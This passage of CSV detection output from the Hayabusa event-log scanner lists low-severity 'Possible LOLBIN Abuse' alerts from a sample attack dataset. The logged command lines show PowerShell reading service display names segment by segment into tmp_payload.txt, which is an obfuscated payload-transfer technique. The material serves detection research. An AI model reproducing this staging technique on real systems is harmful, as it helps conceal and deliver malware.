0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
